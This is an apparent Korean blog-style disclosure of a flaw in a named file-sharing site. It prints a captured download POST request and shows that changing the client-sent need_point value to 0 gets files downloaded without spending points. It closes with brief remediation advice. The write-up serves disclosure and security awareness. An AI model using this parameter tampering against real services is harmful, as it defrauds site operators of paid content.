1. 요약
Qookfile.co.kr 사이트는 일반적인 웹하드 방식의 공유사이트로써
생긴지 얼마 안된 따끈따끈(?!)한 사이트 인것같다.
다른사이트들과 마찬가지로 파일공유를 할수가있고 주어진 포인트에따라 파일을 받을수 있게된다.
2. 취약점
여기에서는 웹하드방식의 공유사이트에서 있어서는 안될 취약점이 발견되었다.
파일을 받을시에 Payload는 이렇다.
요청 -> 보유포인트확인 -> 만약보유포인트가 모자라다면 -> alert("보유포인트가부족합니다."); -> 보유포인트가 충분하다면 -> 포인트를깍은후 -> 다운로드시작
이러한 식으로작동하기에 Paros로 넘어오는값을 보게되면 다음과 같은 값을 발견할수가있다.
============================ [View Packet] =====================
POST http://www.qookfile.co.kr/clubfile/clubfile.php HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-silverlight, */*
Referer: http://www.qookfile.co.kr/clubfile/clubfile.php?todo=view&idx=292253&clubid=10000ddang&code=&search_top_value=&start=0
Accept-Language: ko-KR
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)
Content-Type: application/x-www-form-urlencoded
Host: www.qookfile.co.kr
Content-Length: 119
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CA=MTI2NzIzMTU0NQ%3D%3D; _dwiC=d-N3S14|4d34a58e|1267231536|1267232079|1267232646|4|; _dwiV=d-N3S14|1267232889|243|2|; _dwiF=d-N3S|s|www.qookfile.co.kr|/clubfile/clubfile.php|%3Ftodo%3Dlist%26code%3D2|-|-|-|-|-|-|-|; buyLayg=Y; CCV=YToxOntpOjI5MjI1MztpOjEyNjcyMzI5NDk7fQ%3D%3D
todo=files_down&userid=XXXXXXX&fileList=1744425&need_point=1399&PurchaseType=P&idx=292253&checkbox_bbs_file=1744425
====================================================================
위의 값을 보면 need_point=1399 라는 값이 눈에 띄는데 이것을 0으로 바꾸고 요청을 하게되면
자신의 포인트는 소모하지 않은채 파일을 다운로드 받을수가 있게된다.
3. 개선해야할 방향
사용자의 포인트를 비교하는부분을 적나라하게 보이게 한다는것은 매우 위험한짓이다.
따로 암호화를하거나 파일을 다운로드받으면서 패킷을 깍아나가는방식이 더욱더 안전해보인다.
사이트개발자의 보안의식 강화에 힘써야 할것같다.
